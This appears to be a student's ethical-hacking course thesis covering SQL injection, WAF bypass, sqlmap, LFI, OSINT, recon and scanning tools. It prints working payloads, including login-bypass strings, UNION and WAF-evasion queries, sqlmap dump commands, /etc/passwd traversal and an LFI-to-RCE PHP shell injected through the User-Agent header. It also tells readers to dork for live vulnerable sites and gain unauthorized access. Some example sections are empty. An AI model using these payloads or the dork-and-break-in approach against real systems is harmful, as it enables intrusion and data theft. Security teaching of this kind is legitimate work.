Cyber Security and Ethical Hacking

A thesis submitted in partial fulfillment of the

requirements for the course of Cyber Security And
Ethical hacking

By Md Mahedi Hasan
On March 24

Arena Web Security

 Submitted by
User ID: mahedihasanprodan00
Email: [email protected]
Date of Submission: 24/03/2025

Declaration by student

I, Md Mahedi Hasan Currently a 3 RD Year student of Department of Social

Work studying in Ananda Mohan College Mymensingh, hereby declare that
the work presented herein is original work done by me under the
supervision of Fahim Al Tanjim and has not been published or submitted
elsewhere for the requirement of a degree program. Any literature date or
work done by other and cited within this thesis has given due
acknowledgement and listed in the reference section.

Md Mahedi Hasan
Place: Arena Web Security
Date: 22/3/2025
Certificate

Certified that the thesis entitled “Cyber Security & Ethical Hacking”
submitted by Md Mahedi Hasan towards partial fulfillment for the Course
of cyber security and ethical hacking done by the institution of Arena web
security is based on the investigation and learning done till now from the
beginning of the course carried out under our guidance. The thesis part
therefore has not submitted for the academic award of any other university
or institution.

Countersigned Signature
Mahedi
……………………………….. …………………………………
(Tanjim Al Fahim) (Md Mahedi Hasan)

Supervisor Batch : 53 (Delta).

Abstract

This thesis explores the multifaceted domain of cybersecurity and ethical

hacking, focusing on advanced techniques, tools, and methodologies used
to identify and mitigate vulnerabilities in modern systems. The study delves
into topics such as SQL injection, OSINT tracking, session hijacking,
advanced Local File Inclusion (LFI), web shells, Cross-Site Scripting (XSS),
Cross-Site Request Forgery (CSRF), and the use of tools like Kali Linux,
Burp Suite, Nmap, and Nessus. Additionally, it covers practical aspects
such as web application reconnaissance, vulnerability assessment,
penetration testing, and report writing. The thesis also examines
freelancing opportunities in cybersecurity, such as WordPress malware
removal, and provides insights into bug bounty programs and social
engineering. The goal is to provide a comprehensive guide for
cybersecurity professionals and ethical hackers to enhance their skills and
contribute to a safer digital ecosystem.
Acknowledgement

I would like to express my sincere gratitude to our honourable course

instructor and supervisor Tanjim Al Fahim Sir, Admin Md Ashif Islam , Bijoy
Chandra Mondal, Syed Sakib Alam Mubin and all the moderator and admin
for their continuous advice effort and invertible suggestion throughout the
research. 4 I am really grateful to them. I would also like to thank to all my
course mate of this course who adviced ,helped and suggest me in need of
the entire courses whenever I stucked In some point.

Thank you.

Table Of Contents

Page No

1. Basic Sql Injection…………………………………………………….….7

2. SQL Injection By tools ( Havij)…………………………………..10
3. Manual SQLI Injection………………………………………………..12
4. SQLI WAF Bypass……………………………………………………….15
5. SQLMAP……………………………………………………………………….16
6. Tracking Someone from Online (OSINT)…………………19
7. Session Hijacking/Blocking……………………………………….23
8. Basic to Advance LFI……………………………………………….25
9. Cross Site Scripting (XSS)……………………………………….27
10. Acunetix Web Application Security Scanner…….28
11. Kali Linux Install, Basic And Environment………….31
12. PC and Phone Hacked………………………………………….35
13. Networking and Nmap………………………………………….38
14. Recon For Web Application………………………………….42
15. VAPT By Nuclei, Nikto And Nessus…………………….46
16. Freelancing with WordPress ……………………………….48
17. Conclusion………………………………………………………………50
Basic to Advance SQLI Injection: (Classes-
01, 02, 04, 07, 28)

Class-01: (Basic Sql Injection)

Basic Sql Injection
SQL injection is a code injection technique that is enough sometimes to
destroy our database of an website. SQL injection is one of the most
common web hacking techniques.
SQL injection usually occurs when we ask an user for input, like their
username/password, and instead of a name/id, the user gives us an SQL
statement that we will unknowingly run on our database.
Before we go into the basic Sql injection that how it occurs we have to
know first what is vulnerability of a website mean.
Web Vulnerability: A website vulnerability is a weakness of a website or
web application code that allows an attacker to gain some level of control
of the site, and possibly the hosting server. If the vulnerability of a website
is quite large or if it has low or high level of vulnerability then there is a
possibility for the bad guys or the attackers to attack that website.
So to find such kind of website which has vulnerability we need the help of
google dork. So what is google dork?
Google dork: Google dorking, is a computer hacking technique that uses
Google Search and other Google applications to find security holes in the
configuration and computer code that websites use.
By using google dork we can find all those websites which contains
vulnerabilities for this at first we need to search in the google using google
dork. Here are some of the list of some google dork:
Google Dorks compilation to find SQL injections:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:view_product.php?id=

There are different ways to attack and get access into a website in this part
we have learned about basic sql.
User: 1 'or' 1 '=' 1
Pass: 1 'or' 1 '=' 1
We will need the above user and password to get access in the website.
So how it works?
Each and every website has a database in that database if we put a wrong
username and false query then it will suddenly alert us.
But if we put the above query in the username and password field then the
database will consider it as true and give the attacker the unauthorized
access.
The website won’t understand about the false query and the hacker will
easily get access with the 1=1 query.
1.
2.

Class 02: SQL Injection By tools ( Havij)

Havij

Havij is nothing but a tool which can be used to find out the information
from the database that we want to exploit. For example if we choose
username and password it will show us those website which has any
vulnerability issues.
Using the same dork that we have used earlier in basic sql injection we
have to use the same in havij as well. It is another method of getting
access to a website. But in this case we will need a software to get the
username and password of that website that we have targeted to get
unauthorized access. So in the very beginning we need to Find those
website with the google dork.
Definitely we should try the access in a website which has vulnerability.
To work with havij we have to keep in find if the url of that website has
//https then we must have to remove the S from //https and put only //http
in the search box.

1.
2.

Class 4: Manual SQLI Injection

Manual SQL Injection

Every Website has a database. Where they store all the information within
its server. In every database main information stored in the columns and
rows. So first off all we will find out that how many columns are there in
this website by using:
9 Order by 1-- (INT)
9' Order by 1---+ (STRING [9 is the number of id; like php?id=9 and 1 is the
number of columns]
9 Union select 1,2,3,4,5,6,7,8,9-- (INT)
9' Union select 1,2,3,4,5,6,7,8,9--+ (STRING)
[Are sorted 1-9 in sequence. might have to use (-/.)
This. Like this Id=-9 or id=.9
After this step, Which column is most vulnerable to attack in that column
for get the database.
These steps are following for attacking.
Union based ->DIOS My SQL ->DIOS by WAF (if it not worked then try
another one)
(Copy DIOS link and execute in New tab)
Then get data from those columns.
9Union select 1,2,3,4,5,6,7,8, group_concat(column name) from (__data
name__)-- (INT)
9' Union select 1,2,3,4,5,6,7,8, group_concat(column name) from (__data
name__)-- +(STRING)

Example: For giving an example we can use

 1.

2.
Class 07: SQLI WAF Bypass.

SQLI WAF Bypass

WAF = Web Application Firewall Bypass
A Web Application Firewall (WAF) filters and blocks malicious SQL injection
payloads by matching patterns. Manual bypass techniques exploit
weaknesses in WAF rule design, such as:
* Altering payloads to avoid matching predefined threat signatures.
* Exploiting inconsistencies in how WAFs parse inputs.
* Leveraging SQL or application logic to execute malicious queries
undetected.

Example,

uNiOn sEleCt 1,2,3--+

%27%20UNION%20SELECT%20 1,2,3--+

'/*!50000UNION*//*!50000SELECT*/
1,2,CONCAT(username,0x3d3d,password),4 FROM admin_user-- +

Manual WAF bypass techniques highlight the limitations of signature-

based security systems. By exploiting gaps in input parsing, encoding
normalization, and SQL dialect nuances, attackers can circumvent even
robust WAFs. This underscores the need for defense-in-depth strategies,
combining WAFs with secure coding practices and runtime monitoring to
mitigate evolving threats.

Example: For giving an example we can use

1.

Class 28: SQLMAP

SQLMap
SQLMap is an open-source penetration testing tool that automates the
detection and exploitation of SQL injection vulnerabilities. It supports a
wide range of databases (e.g., MySQL, PostgreSQL, MSSQL) and
techniques (e.g., union-based, blind, time-based SQLi). Unlike manual
methods, SQLMap streamlines the process of fingerprinting databases,
dumping data, and evading security mechanisms like Web Application
Firewalls (WAFs).

SQLMap Workflow: Step-by-Step

Step 1: Identify a Vulnerable Parameter

URL: https://exa.com/
Command: sqlmap -u https://exa.com/ --crawl=2
For default answer: sqlmap -u https://exa.com/ --crawl=2 – batch
Command: cat file/url location

Step 2: Enumerate Databases

Command: sqlmap -u https://exa.com/pro?id=1 --dbs –batch

Step 3: Extract Tables from a Database

Command: sqlmap -u https://exa.com/pro?id=1 -D name --tables -- batch

Step 4: Dump Table Data

Command: sqlmap -u https://exa.com/pro?id=1 -D name -T user –columns
--batch
Step 5: Dump columns Data
Command: sqlmap -u https://exa.com/pro?id=1 -D name -T user -C name
–dump --batch

For result : /root/.local/share/sqlmap/output/siteurl

For show the result : cat + filename

For fast work we can use this command : sqlmap -u (url) –dbs --
threads=2,3,4, -- batch

SQLMap streamlines SQL injection testing by automating payload

generation, database fingerprinting, and data exfiltration. Its flexibility in
bypassing WAFs and executing OS commands highlights the importance of
securing applications against automated exploitation tools. Ethical hackers
leverage SQLMap to identify vulnerabilities, but its power also underscores
the need for robust defenses like input sanitization and least-privilege
database access.
Class 3: Tracking Someone from
Online (OSINT)

OSINT
The term OSINT stands for open source intelligence.
Open-source intelligence (OSINT) is data collected from publicly available
sources to be used in an intelligence context. In the intelligence
community, the term "open" refers to overt,
publicly available sources (as opposed to covert or clandestine sources).
Osint is all about how we can learn to use OSINT tools to better understand
our own digital footprint.

Example:
Google search images: We can use google search images to get
information of a picture by just posting it like the picture given below. But it
is not necessary that one will get every information from google search by
image we have go through some other technique to find info from a picture.
1.

2.
OSINT FOR WEBSITES:
For more info about the Domain like who is the owner and when he/she
regi the domain and when the domain get expaired and also many more
info we can know by that process .
For info website: whois.domaintools.com
For BD site Info: Bdia btcl search
For website lookup : Wayback Machine , with the help for this we can know
the past to present what changes happened in the website.

OSINT FOR HUMAN:

Example, context = men/women name
Context Site:fb/linkedin/x/etc.com

*Grabify:
This tools is useful to gather information of a link or url of an website .It
can access information about user's IP address, location tracker (country,
city) and so on. We can view the full list of features here.
1.
Class 5: Session Hijacking/Blocking

No-redirect
So before we go into the NoRedirect topic we have to know about cookies
and sessions.

Cookies and Sessions are used to store information. Cookies are only
stored on the client-side machine, while sessions get stored on the client
as well as a server. Session. A session creates a file in a temporary
directory on the server where registered session variables and their values
are stored.

NoRedirect is a Firefox/SeaMonkey extension that lets the user take

control of HTTP redirects. It can be used to interdict an ISP's DNS search
redirection hijacks, preview/screen "shortened" URLs, stop the annoying
redirection of "smart" error pages, etc. So what http is Stands for "Hypertext
Transfer Protocol." HTTP is the protocol used to transfer data over the
web. It is part of the Internet protocol suite and defines commands and
services used for transmitting webpage data. HTTP uses a server-client
model. Generally with the help of no-redirect addons we block the urls of
the login page later we can directly go the page of the admin cause the
login webpage has already been blocked. Only blocking the login webpage
doesn’t mean that you can enter the dashboard. If we cannot enter the
dashboard even after blocking the page Then we have to find the other
page of that admin. So to find out the other page of an admin page we have
to take help from a tools. During the use of this tool we have to remove the
other next part after admin from the url and place it in the tool search bar.
For example: 16 If one can get access in that website then the tool will
show beside the url with a green word “found” that mean we can use that
url to get access of that admin dashboard. But that still wont assure us that
all those url with the green word found will help us to get into the
dashboard.

This method will not work in everywhere we have to try with different
technic to get access in a website.

Example:
1.
Basic to Advance LFI: Classes- 06,11

Class 06: LFI

LFI Basics,
LFI= Local File Inclusion
What is LFI?
A vulnerability where an application dynamically includes local files without
proper validation, allowing attackers to read sensitive.

?page=about.php → ?page=../../../etc/passwd
../../../../../../../../../etc/passwd (Linux)
or
../../../../../../../../.././../../../windows\win.ini (Windows)

Traversal:
?file=../../../../etc/passwd
?page=..%2F..%2F..%2Fetc%2Fpasswd

Null Byte:
?file=../../../etc/passwd%00

LFI to RCE (Remote Code Execution)

The /proc/self/environ file contains environment variables of the current
process. If the application includes this file via LFI, you can inject PHP code
into an environment variable ( HTTP_USER_AGENT) and trigger code
execution
1. Identify LFI Vulnerability
?file=../../../../proc/self/environ
2. Poison Environment Variables
GET /vulnerable.php?file=../../../../proc/self/environ HTTP/1.1
Host: target.com
User-Agent: <?php system($_GET['cmd']); ?> # Malicious PHP code
3. Trigger RCE via LFI
?file=../../../../proc/self/environ&cmd=id

Dorking for LFI

inurl:"index.php?page="
filetype:php inurl:"?file="
intitle:"index of" etc/passwd
inurl:".php?file=" site:com
Class 12: Cross Site Scripting (XSS)

XSS,

Cross-Site Scripting (XSS) is a security vulnerability in web applications

that allows attackers to inject malicious scripts into web pages viewed by
other users. These scripts execute in the victim's browser, enabling attacks
like data theft, session hijacking, or website defacement.

Types of XSS
1. Stored -Based XSS
2. Reflected -Based XSS
3. DOM-Based XSS
Class 14: Acunetix Web Application
Security Scanner.

Target Configuration

Add Target URL

1.

Target Settings
Running the Scan
Reviewing Results
Kali Linux Install, Basic And
Environment Setup: Classes-
15,16,18

Class 15: Kali Linux Install

What is a Kernel?
The kernel is the core component of an OS, managing hardware
resources (CPU, memory, devices) and facilitating communication
between software and hardware.

For install Kali Linux on our Computer first we need to on the

Virtualization Setting. Because whe we install the Kali Linux on any
virtual box software its preventing potential harm to the host OS
during security testing.

We use Debian-Based Kali for Cybersecurity and Ethical Hacking

Because of it’s,

Pre-installed Tools 600+ tools

Stability & Customization
Community Support
Install Kali Linux on VirtualBox (GUI Mode)

Download ISO: Get Kali’s ISO from official site.

Create VM:

Open VirtualBox → New → Name: "Kali" → Type: Linux → Version:

Debian (64-bit).

Allocate RAM (4GB+) and storage (20GB+).

Mount ISO:

Settings → Storage → Attach ISO under "Optical Drive".

Install Kali:

Start VM → Select "Graphical Install" → Follow prompts (language,

hostname).

Partitioning: Use "Guided - Use Entire Disk".

User Setup: Set root password and create a standard user.

Post-Install: Install VirtualBox Guest Additions for shared folders.

Basic Kali Linux Commands

Update :
sudo apt update && sudo apt upgrade
Common Commands:

ls: List files.

cd: Change directory.

nano: Text editor.

ip a: Show network interfaces.

mkdir: make directory.

Importance of Repositories,

Repositories host verified software packages. Kali’s repos:

Ensure tools are vetted for security.

Simplify updates via apt.

Prevent manual downloads (reducing malware risks).

File Sharing Windows to Kali,

Select the file → Properties → Sharing → Share → select Everyone +

read + write permission → Share → Done

Advance Sharing → Share the folder box check → Apply → Okh

Virtual Box
Kali Setting → Shared folder → + and select the folder.
Does not check the Read only Box.
We can find the folder on Kali Linux → home → under Devices.
Then Copy the file and Create a new folder with the file name.

Go Language Setup Kali Linux:

Copy the link of go language for kali linux → Run the command → wget +
copy url

Then aslo run this for some settings,

export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
Class 17: PC and Phone Hacked

1. What is keylogger?
A keylogger is a surveillance tool (hardware or software) that records
keystrokes to capture sensitive data like passwords, credit card numbers,
and messages.
Example:
The Olympic Vision keylogger targeted diplomats and executives by
recording keystrokes and exfiltrating data via email.

2. What is RAT?
RAT=Remote Access Trojans
A RAT is malware that grants attackers full remote control over a
compromised device.
How it work?
Phishing emails, malicious downloads .
Drops payloads like njRAT or DarkComet.
Screen recording.
File theft.
Webcam activation
Command execution.

Example:
The Pegasus Spyware (NSO Group) exploited zero-day vulnerabilities to
4. What is malware?
Malware (malicious software) disrupts, damages, or gains unauthorized
access to systems.

Types:

Viruses: Attach to clean files.

Worms: Self-replicate via networks.
Trojans: Disguised as legitimate software.
Ransomware: Encrypts files for extortion.

Example:
NotPetya masqueraded as ransomware but was designed to destroy data,
causing $10 billion in damages globally.

5. What is Antivirus?
Antivirus software detects, blocks, and removes malware.

How It Works:

Signature-Based Detection: Matches files against a database of known

malware hashes.

Heuristic Analysis: Identifies suspicious behavior.

Sandboxing: Executes files in isolated environments to observe behavior.

Limitations:

Struggles with zero-day exploits.

Bypassed by polymorphic malware.

Example:
Windows Defender uses cloud-based machine learning to flag unknown
threats.

6. Virus Distribution Systems:

Phishing Campaigns: Malicious attachments.

Drive-by Downloads: Exploit kits on compromised websites.
Social Engineering: Fake software updates.
Removable Media: USB drops .
Example:
The Mirai Botnet spread via default IoT device credentials, creating a DDoS
army.

Keyloggers, RATs, and malware represent the offensive toolkit of modern

hackers, while antivirus and behavioral analysis form the defensive front.
Understanding these mechanisms—and their evasion tactics—is critical for
developing robust cybersecurity strategies. As attackers innovate,
defenders must adopt proactive measures like AI-driven threat hunting and
zero-trust architectures to stay ahead.
Class 19: Networking and Nmap.
Networking ,
1. What is a Network?
A network is a system of interconnected devices that communicate via
standardized protocols (TCP/IP) to share resources. Networks enable data
transfer, remote access, and services like email or web browsing.

Types of Networks:

LAN (Local Area Network).

MAN (Metropolitan Area Network).
WAN (Wide Area Network).

2. What is an IP Address?
An IP (Internet Protocol) address is a unique numerical identifier assigned
to devices on a network. It enables routing and communication between
devices.

Example:
192.168.1.1 (IPv4) or 2001:0db8:85a3::8a2e:0370:7334 (IPv6).

3. Addressing in Networks
Addressing ensures devices can locate and communicate with each other.
Two primary types:
Logical Addressing (IP Addresses): Dynamic (DHCP) or static assignments.

Physical Addressing (MAC Addresses): Hard-coded into network

interfaces.

4.TCP/UDP Networks
TCP (Transmission Control Protocol):

Connection-oriented: Establishes a handshake (SYN > SYN-ACK > ACK).

Reliable: Guarantees delivery via acknowledgments and retransmissions.
Used for HTTP, FTP, email.

UDP (User Datagram Protocol):

Connectionless: No handshake or error recovery.

Fast but unreliable: Ideal for streaming, VoIP, gaming.

5. IPv4 vs. IPv6

IPv4:

32-bit address (4.3 billion unique addresses).

Exhausted due to internet growth.
Uses NAT (Network Address Translation) to conserve addresses.

IPv6:

128-bit address (340 undecillion addresses).

Hexadecimal format with colons (e.g., 2001:0db8:85a3::8a2e:0370:7334).
Built-in security (IPsec) and simplified routing.

Nmap
6. Nmap: The Network Mapper
Nmap is an open-source tool for network discovery, port scanning, and
vulnerability detection.

How It Works:

some nmap flag/command

-sV = for service version detect
-p = port . there is 65535 port In the world. All port are not open at the
same time that’s why this is important to find specfic/identifie open port
-sC = Bydefult Scripting.
-T = time
-Pn = Host Discovery/ ping discovery
-oN = save the scan result to a normal txt file.
Recon For Web Application: Classes
– 20,22,26
Recon
1. Introduction to Web Application Reconnaissance
Reconnaissance (recon) is the systematic process of gathering intelligence
about a target web application to identify vulnerabilities, attack surfaces,
and potential entry points. This phase is critical for ethical hackers to map
out weaknesses before malicious actors exploit them. Below is a
structured breakdown of recon stages and tools.

1. Initial Recon
Objective: Collect basic information about the target (IP ranges, domains,
DNS records).
Tools:
Censys
censys search "domain:example.com"

Shodan: Identifies exposed servers, databases, and IoT devices.

DNSdumpster: Maps DNS records and subdomains.

WHOIS: Retrieves domain registration details (owner, creation date).

2. Technology Discovery
Objective: Determine the tech stack (frameworks, CMS, servers).
Tools:
Wappalyzer: Browser extension detecting
BuiltWith: Profiles backend infrastructure
WhatWeb: CLI tool for server and script detection.

3. Subdomain Discovery
Objective: Uncover subdomains (admin.example.com, api.example.com).

A 2023 bug bounty program uncovered dev.internal.example.com via

subfinder, leading to an exposed Jenkins server.

4. URL Discovery
Objective: Compile all accessible URLs (endpoints, archived pages).

Tools:
Katana: Crawls websites recursively.
katana -u https://example.com

5. Parameter Discovery
Objective: Identify input parameters for testing.

Tools:
ParamSpider: Extracts parameters from URLs.
paramspider -d example.com
Gf-Patterns: Filters parameters for specific vulnerabilities (SQLi).
6. Verify Active Items
Objective: Confirm live hosts/endpoints and filter out dead links.

Tools:
httpx: Fast HTTP toolkit for probing URLs.
httprobe: Checks if domains resolve.

7. Visualization
Objective: Generate visual reports (screenshots, network maps).

Tools:
Aquatone: Captures screenshots and organizes data.

8. JavaScript Analysis
Objective: Scan client-side code for secrets (API keys, tokens).

Tools:
SecretFinder:python3 SecretFinder.py -i https://example.com -o cli
JSSCanner: Detects endpoints and vulnerabilities in JS files.

9. File and Directory Discovery

Objective: Find hidden files (backup.zip, config.php).

Tools: ffuf: Fast web fuzzer.

ffuf -w wordlist.txt -u https://example.com/FUZZ

10. Wordlists
Objective: Use curated payloads for brute-forcing.

Resources:
SecLists: Default wordlist repository.
Class 27 & 34: VAPT By Nuclei, Nikto
And Nessus

Introduction to VAPT
Vulnerability Assessment and Penetration Testing (VAPT) combines
automated scanning (VA) and manual exploitation (PT) to identify and
validate security weaknesses. This section explores three pivotal tools:
Nuclei (rapid template-based scanning), Nikto (web server analysis), and
Nessus (enterprise-grade vulnerability management).

1. Nuclei: Scans for CVEs, misconfigurations, and exposures using

community-driven templates.

How It Works:
Target Input: Provide URLs, domains, or Ips

Command Example:
nuclei -u https://example.com -t cves/ -severity critical,high

[critical] [CVE-2023-1234] SQL Injection @

https://example.com/search?q=1
[high] [exposed-panel] Admin Dashboard @ https://example.com/admin
 2. Nikto: Web Server Vulnerability Scanner.
Identifies web server flaws (outdated software, risky headers).

Command Example: nikto -h https://example.com -Display 1234

3.Nessus: Scans networks, cloud, and OT systems for vulnerabilities and

compliance gaps.

How It Works:

Scan Setup: Advanced Scan > Configure Ports, Plugins.

Start scan:
nessuscli scan --policy "Web App Audit" --targets example.com
Freelancing with Wordpress Malware
Removal Service:
Classes – 21,23,30

WordPress Install

Part 1: Manual WordPress Installation

Prepare Your Environment

Download WordPress
Upload WordPress Files
Create a MySQL Database
Configure wp-config.php
Run the WordPress Installation Script
Secure Your Installation
Malware Removal:

Part 2: Manual Malware Removal

Identify the Malware

Backup Your Website
Put Your Site in Maintenance Mode
Remove Malicious Files
1. wp-content/upload
2. wp-content/themes
3. wp-content/plugins
4. Root directory

Clean Infected Files

Check the Database
Update Everything
Change Passwords
Reinstall WordPress Core Files
Scan Again
Harden Security
Remove Maintenance Mode
Monitor Your Site
Conclusion: I would like to say that this course has explored the
multifaceted domain of cybersecurity and ethical hacking, providing a
comprehensive understanding of vulnerabilities, exploitation techniques,
and mitigation strategies. From mastering manual SQL injection and WAF
bypass techniques to implementing WordPress malware removal
workflows, the research underscores the critical need for proactive security
measures in an increasingly digital world. The practical applications of
these skills—whether in freelancing, penetration testing, or ethical
hacking—highlight the importance of continuous learning and adaptation to
counter evolving threats.

As cyberattacks grow in sophistication, the insights gained from this study

serve as a foundation for building safer, more resilient digital ecosystems.
The ethical responsibility of leveraging these skills for the greater good
cannot be overstated. By fostering a culture of collaboration, innovation,
and relentless curiosity, we can collectively rise to the challenges of today’s
dynamic digital landscape and secure a safer future for all.